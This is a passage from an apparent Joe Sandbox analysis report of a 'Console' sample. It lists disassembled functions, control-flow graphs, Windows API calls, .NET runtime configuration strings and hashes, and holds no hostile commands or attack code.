                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual$ConsoleCountCriticalCtrlHandlerInfoInitializeSectionSystemTick
                                                                                                                                                                                                                          • String ID: %s completed$%s failed with code %x$===================EEStartup Completed===================$===================EEStartup Starting===================$EX_RETHROW line %d$EnsureRtlFunctions()$GC heap initialization failed with error 0x%08X$InitializeContext2$Returned successfully from InitThreadManager$RtlRestoreContext$g_pConfig->sync()$kernel32.dll$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 1537217695-3323499670
                                                                                                                                                                                                                          • Opcode ID: 40dee12f3c277b8ee3b0c1c7f99bd791f5c2c257158e1b9296667a7556a289fb
                                                                                                                                                                                                                          • Instruction ID: c08625c04d66bf06f37b186e6d9be290bc103d3bedee8c6dacf13c46035db4ae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40dee12f3c277b8ee3b0c1c7f99bd791f5c2c257158e1b9296667a7556a289fb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D42B174A003069FE720EFA9EC46BAE7BA1FB54704F10441EE905A7398EB759910CB72
                                                                                                                                                                                                                          Function 010D2F70 Relevance: 48.0, APIs: 10, Strings: 17, Instructions: 792memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AE8E
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,?), ref: 0121AEA2
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0121AEAE
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000), ref: 0121AED2
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 010D319C
                                                                                                                                                                                                                          • wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,00000000,?,00000000), ref: 010D322E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 010D333A
                                                                                                                                                                                                                          • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,debug,?,00000000), ref: 010D3384
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 010D33B5
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 010D34B2
                                                                                                                                                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000), ref: 010D373C
                                                                                                                                                                                                                          • wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,0000000A), ref: 010D3752
                                                                                                                                                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 010D375E
                                                                                                                                                                                                                            • Part of subcall function 0121AE20: HeapFree.KERNEL32(00000000,00000000,7CAB6A82,93F80028,0CB3F4BC,00004000), ref: 0121AF0F
                                                                                                                                                                                                                            • Part of subcall function 0121B260: wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,00000000,00000000,0164A018,00000000,010D3877,?,00000000), ref: 0121B28E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 010D3B66
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • ZapBBInstr, xrefs: 010D34EB
                                                                                                                                                                                                                          • System.Runtime.TieredPGO, xrefs: 010D394C
                                                                                                                                                                                                                          • System.Runtime.TieredCompilation.QuickJit, xrefs: 010D3817
                                                                                                                                                                                                                          • true, xrefs: 010D3027
                                                                                                                                                                                                                          • System.Runtime.InteropServices.BuiltInComInterop.IsSupported, xrefs: 010D3717
                                                                                                                                                                                                                          • System.GC.Concurrent, xrefs: 010D3013
                                                                                                                                                                                                                          • ReadyToRunExcludeList, xrefs: 010D342C
                                                                                                                                                                                                                          • MODIFIABLE_ASSEMBLIES, xrefs: 010D32FC
                                                                                                                                                                                                                          • System.Runtime.TieredCompilation.CallCountThreshold, xrefs: 010D3867
                                                                                                                                                                                                                          • debug, xrefs: 010D337E
                                                                                                                                                                                                                          • LogCCWRefCountChange, xrefs: 010D36BE
                                                                                                                                                                                                                          • System.GC.LOHThreshold, xrefs: 010D321B
                                                                                                                                                                                                                          • RestrictedGCStressExe, xrefs: 010D30BC
                                                                                                                                                                                                                          • System.Runtime.TieredCompilation.CallCountingDelayMs, xrefs: 010D389C
                                                                                                                                                                                                                          • System.Runtime.TieredCompilation.QuickJitForLoops, xrefs: 010D382D
                                                                                                                                                                                                                          • System.Runtime.TieredCompilation, xrefs: 010D37FD
                                                                                                                                                                                                                          • StartupDelayMS, xrefs: 010D372C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$_errnowcstoul$_wcsicmp
                                                                                                                                                                                                                          • String ID: LogCCWRefCountChange$MODIFIABLE_ASSEMBLIES$ReadyToRunExcludeList$RestrictedGCStressExe$StartupDelayMS$System.GC.Concurrent$System.GC.LOHThreshold$System.Runtime.InteropServices.BuiltInComInterop.IsSupported$System.Runtime.TieredCompilation$System.Runtime.TieredCompilation.CallCountThreshold$System.Runtime.TieredCompilation.CallCountingDelayMs$System.Runtime.TieredCompilation.QuickJit$System.Runtime.TieredCompilation.QuickJitForLoops$System.Runtime.TieredPGO$ZapBBInstr$debug$true
                                                                                                                                                                                                                          • API String ID: 3256802023-3551552797
                                                                                                                                                                                                                          • Opcode ID: d734e70fe4d899ee19385f4734940d2352e4ac599a2f4ea7b3cb2ede5de2aeae
                                                                                                                                                                                                                          • Instruction ID: 277e49d0fafe7ac658b4b7a4430d74aa4d2bd4ae2d5bb0b24c549d2d708729dd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d734e70fe4d899ee19385f4734940d2352e4ac599a2f4ea7b3cb2ede5de2aeae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC7223B0A113969BEB61DB28C8447E9BBF2BF55300F0445E9C5499F385EB709E84CF92
                                                                                                                                                                                                                          Function 012521F0 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 115pipeCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1005 12521f0-12521fd 1006 12521ff-1252201 1005->1006 1007 1252219-1252220 1005->1007 1010 1252214-1252218 1006->1010 1011 1252203-1252212 1006->1011 1008 1252227-1252264 CreateNamedPipeA 1007->1008 1009 1252222-1252226 1007->1009 1012 1252266-1252268 1008->1012 1013 125227f-1252282 1008->1013 1011->1010 1014 125226e-125227a GetLastError 1012->1014 1015 125232a-1252339 call 1252500 1012->1015 1016 1252284-12522ad GetCurrentProcess * 2 DuplicateHandle 1013->1016 1017 12522c1-12522d7 CreateEventW 1013->1017 1019 1252320-1252328 1014->1019 1016->1017 1021 12522af-12522b1 1016->1021 1022 12522d9-12522db 1017->1022 1023 12522eb-1252300 ConnectNamedPipe 1017->1023 1019->1015 1021->1015 1025 12522b3-12522bf GetLastError 1021->1025 1022->1015 1026 12522dd-12522e9 GetLastError 1022->1026 1027 1252302-125230d GetLastError 1023->1027 1028 125233a-1252346 1023->1028 1025->1019 1026->1019 1027->1028 1029 125230f-1252314 1027->1029 1029->1028 1031 1252316-1252318 1029->1031 1031->1015 1032 125231a-125231b 1031->1032 1032->1019
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateNamedPipeA.KERNEL32(00000000,40080003,00000008,000000FF,00004000,00004000,00000000,00000000), ref: 01252255
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0125226E
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000118,00000000,00000000,00000002), ref: 01252291
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 0125229E
                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(00000000), ref: 012522A5
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 012522B3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Cannot call Listen on a client connection, xrefs: 01252205
                                                                                                                                                                                                                          • A client process failed to connect., xrefs: 0125231B
                                                                                                                                                                                                                          • Failed to ownership sentinel., xrefs: 012522BA
                                                                                                                                                                                                                          • Failed to create overlap event, xrefs: 012522E4
                                                                                                                                                                                                                          • Failed to create an instance of a named pipe., xrefs: 01252275
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentErrorLastProcess$CreateDuplicateHandleNamedPipe
                                                                                                                                                                                                                          • String ID: A client process failed to connect.$Cannot call Listen on a client connection$Failed to create an instance of a named pipe.$Failed to create overlap event$Failed to ownership sentinel.
                                                                                                                                                                                                                          • API String ID: 1242093035-1870640685
                                                                                                                                                                                                                          • Opcode ID: ee24becb48aac29812abe759ef6dcc9074bf608ce97a3e52213dc3f35c99f6c5
                                                                                                                                                                                                                          • Instruction ID: 9b93bae4a952db5c0f557ce4e6a7fed2b37b4e47dd714132f13bed6c3dff928b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee24becb48aac29812abe759ef6dcc9074bf608ce97a3e52213dc3f35c99f6c5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E310431750212FBE77A1739AC8ABE9BA48BB00B21F110219FF11E52E1C770585187A2
                                                                                                                                                                                                                          Function 01215200 Relevance: 15.2, APIs: 10, Instructions: 218memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1585 1215200-121524a call 11c7de0 GetSystemInfo 1588 1215267-1215285 GetCurrentProcess GetProcessAffinityMask 1585->1588 1589 121524c-1215258 GetNumaHighestNodeNumber 1585->1589 1590 1215287-121528c 1588->1590 1591 12152bb-12152c7 1588->1591 1589->1588 1592 121525a-121525e 1589->1592 1593 1215291-1215293 1590->1593 1594 12152c9-12152d7 GetProcessHeap 1591->1594 1595 12152dc-12152eb HeapAlloc 1591->1595 1592->1588 1596 1215260 1592->1596 1597 12152b0-12152b6 1593->1597 1598 1215295-12152a9 1593->1598 1594->1595 1599 1215313-1215320 1595->1599 1600 12152ed-12152fc 1595->1600 1596->1588 1597->1593 1601 12152b8 1597->1601 1598->1597 1604 1215433-1215444 1599->1604 1605 1215326-121532e call 1228200 1599->1605 1602 1215302-1215312 call 14ab464 1600->1602 1603 12155ed-12155f8 1600->1603 1601->1591 1607 1215446-1215454 GetProcessHeap 1604->1607 1608 1215459-1215468 HeapAlloc 1604->1608 1605->1604 1616 1215334-1215345 1605->1616 1607->1608 1610 1215483 1608->1610 1611 121546a-1215478 1608->1611 1617 1215489-1215499 1610->1617 1614 121547a call 14ab464 1611->1614 1615 121547f-1215481 1611->1615 1614->1615 1615->1617 1619 1215347-1215355 GetProcessHeap 1616->1619 1620 121535a-1215369 HeapAlloc 1616->1620 1621 121549b-12154a5 1617->1621 1622 12154af-121551d 1617->1622 1619->1620 1623 1215384 1620->1623 1624 121536b-1215379 1620->1624 1621->1622 1625 1215533-12155d3 1622->1625 1626 121551f-1215529 1622->1626 1629 121538a-121539a 1623->1629 1627 1215380-1215382 1624->1627 1628 121537b call 14ab464 1624->1628 1630 12155d5 1625->1630 1631 12155df-12155eb 1625->1631 1626->1625 1627->1629 1628->1627 1633 12153b0-121541e 1629->1633 1634 121539c-12153a6 1629->1634 1630->1631 1631->1603 1635 12155f9-121560e 1631->1635 1633->1631 1636 1215424-121542e 1633->1636 1634->1633 1636->1631
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 01215217
                                                                                                                                                                                                                          • GetNumaHighestNodeNumber.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 01215250
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,01419A2D,?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 01215276
                                                                                                                                                                                                                          • GetProcessAffinityMask.KERNEL32(00000000), ref: 0121527D
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 012152C9
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000004,?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 012152E1
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 01215347
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000010,?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 0121535F
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 01215446
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000004,?,?,?,?,?,?,?,?,?,01419A2D,00000000), ref: 0121545E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Process$Alloc$AffinityCurrentHighestInfoMaskNodeNumaNumberSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4161135185-0
                                                                                                                                                                                                                          • Opcode ID: b1c5faf45aa4e329e7faa9de7bba51c99a4bcc3317ba44150d33d82914a59ff6
                                                                                                                                                                                                                          • Instruction ID: d13b9f3736121a96d1de229cf910912dcd80042526d9e2d7728b9886c32eda33
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1c5faf45aa4e329e7faa9de7bba51c99a4bcc3317ba44150d33d82914a59ff6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5A166B66102418FEB39CF69FC4C79A3BE4FB96309F446059E5059B358D77284A8CFA0
                                                                                                                                                                                                                          Function 01099D00 Relevance: 9.5, APIs: 4, Strings: 1, Instructions: 770COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1741 1099d00-1099d7e InitializeCriticalSection call 1215ca0 1744 1099d80-1099d8e call 1215d00 1741->1744 1745 1099db5-1099db7 1741->1745 1750 1099da9-1099db3 1744->1750 1751 1099d90-1099da3 call 14af100 1744->1751 1747 1099dba-1099df5 call 1215ca0 1745->1747 1754 1099e4f-1099e51 1747->1754 1755 1099df7-1099dfc 1747->1755 1750->1747 1751->1750 1757 1099e54-1099e89 call 1215ca0 1754->1757 1758 1099e00-1099e05 1755->1758 1763 1099e8b-1099e99 call 1215d00 1757->1763 1764 1099ec0-1099ec2 1757->1764 1758->1758 1760 1099e07-1099e24 call 1215d00 1758->1760 1767 1099e43-1099e4d 1760->1767 1768 1099e26-1099e41 call 14af100 1760->1768 1775 1099e9b-1099eae call 14af100 1763->1775 1776 1099eb4-1099ebe 1763->1776 1766 1099ec5-1099efa call 1215ca0 1764->1766 1777 1099efc-1099f0a call 1215d00 1766->1777 1778 1099f31-1099f33 1766->1778 1767->1757 1768->1767 1775->1776 1776->1766 1785 1099f0c-1099f1f call 14af100 1777->1785 1786 1099f25-1099f2f 1777->1786 1781 1099f36-1099f6b call 1215ca0 1778->1781 1789 1099f6d-1099f7b call 1215d00 1781->1789 1790 1099fa2 1781->1790 1785->1786 1786->1781 1797 1099f7d-1099f90 call 14af100 1789->1797 1798 1099f96-1099fa0 1789->1798 1791 1099fa4-1099fd7 1790->1791 1795 1099fd9-1099fe4 call 122e910 1791->1795 1796 109a03d-109a067 1791->1796 1805 1099fe9-1099ff3 1795->1805 1799 109a06d 1796->1799 1800 109a3b4-109a411 call ff1130 call 109ca60 call 109d7b0 1796->1800 1797->1798 1798->1791 1803 109a008-109a01d call 1215ca0 1799->1803 1822 109a4af-109a4b7 1800->1822 1823 109a417-109a41d 1800->1823 1813 109a06f-109a071 1803->1813 1814 109a01f-109a03b call 104a420 1803->1814 1805->1800 1808 1099ff9-109a005 1805->1808 1808->1803 1815 109a074-109a0a9 call 1215ca0 1813->1815 1814->1815 1826 109a0cb-109a0cd 1815->1826 1827 109a0ab-109a0c9 call 104a420 1815->1827 1824 109a4b9-109a4cc 1822->1824 1825 109a4d6-109a4de 1822->1825 1828 109a420-109a438 1823->1828 1824->1825 1829 109a4fd-109a505 1825->1829 1830 109a4e0-109a4f3 1825->1830 1832 109a0d0-109a103 call 1215ca0 1826->1832 1827->1832 1851 109a47a-109a48d 1828->1851 1852 109a43a-109a455 1828->1852 1836 109a524-109a52c 1829->1836 1837 109a507-109a51a 1829->1837 1830->1829 1848 109a113 1832->1848 1849 109a105-109a111 call 1414730 1832->1849 1839 109a54b-109a553 1836->1839 1840 109a52e-109a541 1836->1840 1837->1836 1845 109a572-109a57a 1839->1845 1846 109a555-109a568 1839->1846 1840->1839 1855 109a599-109a5a1 1845->1855 1856 109a57c-109a58f 1845->1856 1846->1845 1850 109a115-109a148 call 1215ca0 1848->1850 1849->1850 1879 109a15b-109a15d 1850->1879 1880 109a14a-109a159 call 1414730 1850->1880 1865 109a49d-109a4a6 1851->1865 1866 109a48f-109a49a call 109d7f0 1851->1866 1861 109a46d-109a473 1852->1861 1862 109a457-109a464 1852->1862 1863 109a5b3-109a5bb 1855->1863 1864 109a5a3-109a5a9 call 109a740 1855->1864 1856->1855 1874 109a4ac 1861->1874 1875 109a475-109a478 1861->1875 1870 109a46a 1862->1870 1871 109a466-109a468 1862->1871 1876 109a5cd-109a5d5 1863->1876 1877 109a5bd-109a5c3 call 109a740 1863->1877 1864->1863 1865->1828 1865->1874 1866->1865 1870->1861 1871->1862 1871->1870 1874->1822 1875->1828 1883 109a5e7-109a5ef 1876->1883 1884 109a5d7-109a5dd call 109a740 1876->1884 1877->1876 1891 109a160-109a190 call 1215ca0 1879->1891 1880->1891 1887 109a601-109a609 1883->1887 1888 109a5f1-109a5f7 call 109a740 1883->1888 1884->1883 1895 109a61b-109a623 1887->1895 1896 109a60b-109a611 call 109a740 1887->1896 1888->1887 1909 109a1a0 1891->1909 1910 109a192-109a19e call 1414730 1891->1910 1902 109a645-109a64d 1895->1902 1903 109a625-109a643 call 14ab398 1895->1903 1896->1895 1907 109a66c-109a677 1902->1907 1908 109a64f-109a65c 1902->1908 1903->1902 1915 109a679-109a6a3 call ffe9a0 DeleteCriticalSection call fcfd40 1907->1915 1916 109a6a8-109a6b1 1907->1916 1908->1907 1913 109a65e-109a666 VirtualFree 1908->1913 1911 109a1a2-109a1d2 call 1215ca0 1909->1911 1910->1911 1928 109a1e8-109a1ea 1911->1928 1929 109a1d4-109a1e6 call 1414730 1911->1929 1913->1907 1915->1916 1919 109a6b3-109a6dd call ffe9a0 DeleteCriticalSection call fcfd40 1916->1919 1920 109a6e2-109a701 1916->1920 1919->1920 1925 109a703-109a715 call 14ab398 1920->1925 1926 109a717-109a736 call 107f620 1920->1926 1925->1926 1934 109a1ed-109a33b call 1215ca0 1928->1934 1929->1934 1941 109a33d-109a34c call 11517d0 1934->1941 1942 109a34f-109a370 call 122a500 1934->1942 1941->1942 1947 109a372-109a383 call 122a520 1942->1947 1948 109a386-109a38c 1942->1948 1947->1948 1950 109a399-109a3b1 1948->1950 1951 109a38e-109a392 1948->1951 1951->1950
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(000000AC,7CAB6A82,01506474,00000000,?), ref: 01099D4D
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: GetProcessHeap.KERNEL32(?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002,00000002), ref: 01215CAC
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000002,?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002), ref: 01215CCA
                                                                                                                                                                                                                            • Part of subcall function 01215D00: GetProcessHeap.KERNEL32(00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82,00000002), ref: 01215D0C
                                                                                                                                                                                                                            • Part of subcall function 01215D00: RtlAllocateHeap.NTDLL(03BF0000,00000000,?,00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82), ref: 01215D28
                                                                                                                                                                                                                            • Part of subcall function 011517D0: SleepEx.KERNEL32(00000001,00000000), ref: 011518D3
                                                                                                                                                                                                                            • Part of subcall function 011517D0: SwitchToThread.KERNEL32(7CAB6A82,00000000,?,03C19D40), ref: 011518D9
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: _swprintf.LIBCMT ref: 0109CAC4
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CAD8
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: WriteFile.KERNEL32(?,00000000), ref: 0109CAED
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: _swprintf.LIBCMT ref: 0109CB0D
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CB21
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: WriteFile.KERNEL32(?,00000000), ref: 0109CB36
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: _swprintf.LIBCMT ref: 0109CB56
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CB6A
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: WriteFile.KERNEL32(?,00000000), ref: 0109CB7F
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: _swprintf.LIBCMT ref: 0109CB9F
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 0109CBB3
                                                                                                                                                                                                                            • Part of subcall function 0109CA60: WriteFile.KERNEL32(?,00000000), ref: 0109CBC8
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,7CAB6A82,00000000,00001000,00000000), ref: 0109A666
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,?,7CAB6A82,00000000,00001000,00000000), ref: 0109A68F
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,?,7CAB6A82,00000000,00001000,00000000), ref: 0109A6C9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • VirtualCallStubManagerManager::AddStubManager - 0x%p (vptr 0x%p), xrefs: 0109A375
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
